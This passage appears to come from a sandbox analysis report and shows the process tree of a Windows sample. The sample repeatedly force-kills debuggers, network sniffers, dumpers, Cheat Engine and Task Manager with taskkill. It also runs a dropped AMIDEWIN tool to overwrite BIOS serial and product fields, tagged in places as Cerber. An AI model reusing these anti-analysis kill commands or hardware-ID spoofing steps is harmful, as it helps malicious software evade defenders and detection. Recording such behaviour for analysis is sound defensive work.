- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:3008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3592
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    PID:1604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:1012
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Cerber
    PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:1100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:3228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:2912
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:3808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:3240
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:4080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    PID:2900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:3716
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Kills process with taskkill
    PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:2056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:1032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3748
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4468
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4424
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:4572
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:3800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Kills process with taskkill
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Kills process with taskkill
    PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:4548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:2732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:1996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:1540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:3512
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:3412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3344
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:1812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4432
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:2496
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4164
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4696
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Cerber
    PID:1772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4824
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:2676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1252
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1884
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1528
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:2312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:2880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:1516
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:1604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:3364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:1112
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:1100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:1264
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:2416
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:5032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:4048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:3460
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:4864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1308
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4172
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:1776
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:2576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:2552
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:764
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:3092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Kills process with taskkill
    PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:3912
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:2748
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Kills process with taskkill
    PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4140
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3968
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3148
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:2332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:1696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4528
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2496
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:3168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:4164
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Kills process with taskkill
    PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:232
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Cerber
    PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4340
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4624
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2580
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:1524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4516
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3436
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    PID:3188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2128
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:1280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4076
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:2852
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:3228
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:2448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:2756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:2416
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    PID:3580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:5032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:3544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:4048
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    PID:464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:2712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:3696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:5052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:2056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:1032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3748
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3284
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Kills process with taskkill
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
  2⤵
  PID:4424
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    PID:3772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:880
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    PID:1476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
  2⤵
  PID:764
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    - Executes dropped EXE
    PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
  2⤵
  PID:1972
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    - Executes dropped EXE
    PID:4200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:2940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
  2⤵
  PID:4604
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
    3⤵
    - Executes dropped EXE
    PID:1540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:2164
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:3412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SS XM31X1W84D
  2⤵
  PID:4436
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SS XM31X1W84D
    3⤵
    - Executes dropped EXE
    PID:3344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
  2⤵
  PID:1428
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
    3⤵
    - Executes dropped EXE
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Kills process with taskkill
    PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
  2⤵
  PID:4584
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    - Executes dropped EXE
    PID:1388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:2456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
  2⤵
  PID:2256
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    - Executes dropped EXE
    PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Cerber
    PID:3904
- C:\Windows\system32\cmd.exe
